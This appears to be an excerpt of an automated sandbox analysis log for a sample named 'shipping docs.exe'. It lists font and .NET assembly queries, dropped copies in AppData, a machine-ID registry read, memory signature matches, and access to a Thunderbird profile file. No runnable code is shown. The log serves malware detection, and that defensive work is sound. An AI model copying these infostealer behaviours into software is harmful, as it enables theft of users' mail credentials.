                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exe | Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                Source: C:\Users\user\Desktop\shipping docs.exe | Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\shipping docs.exe | Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\shipping docs.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\shipping docs.exe | Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\shipping docs.exe | Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\shipping docs.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\shipping docs.exe | Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\shipping docs.exe | Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\shipping docs.exe | Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\shipping docs.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\shipping docs.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\shipping docs.exe | Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                Source: C:\Users\user\Desktop\shipping docs.exe | Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\shipping docs.exe | Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\shipping docs.exe | Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                Source: C:\Users\user\Desktop\shipping docs.exe | Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                Source: C:\Users\user\Desktop\shipping docs.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\user\Desktop\shipping docs.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                Source: C:\Users\user\Desktop\shipping docs.exe | Queries volume information: C:\Users\user\Desktop\shipping docs.exe VolumeInformation
                Source: C:\Users\user\Desktop\shipping docs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\shipping docs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\shipping docs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Users\user\Desktop\shipping docs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Users\user\Desktop\shipping docs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Users\user\Desktop\shipping docs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Users\user\Desktop\shipping docs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\shipping docs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe | Queries volume information: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | Queries volume information: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | Queries volume information: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe | Queries volume information: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | Queries volume information: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\shipping docs.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match | File source: 00000012.00000002.520653491.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000015.00000002.518773451.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.518422910.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: shipping docs.exe PID: 3776, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: yVGAJfiVEvtg.exe PID: 3680, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: VMqTMMD.exe PID: 5228, type: MEMORYSTR
                Source: Yara match | File source: 3.0.shipping docs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.shipping docs.exe.35d2730.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.shipping docs.exe.35d2730.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.270616747.00000000034A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000000.262419819.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000012.00000002.520653491.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000015.00000002.518773451.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.518422910.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: shipping docs.exe PID: 2400, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: shipping docs.exe PID: 3776, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: yVGAJfiVEvtg.exe PID: 3680, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: VMqTMMD.exe PID: 5228, type: MEMORYSTR
                Source: C:\Users\user\Desktop\shipping docs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
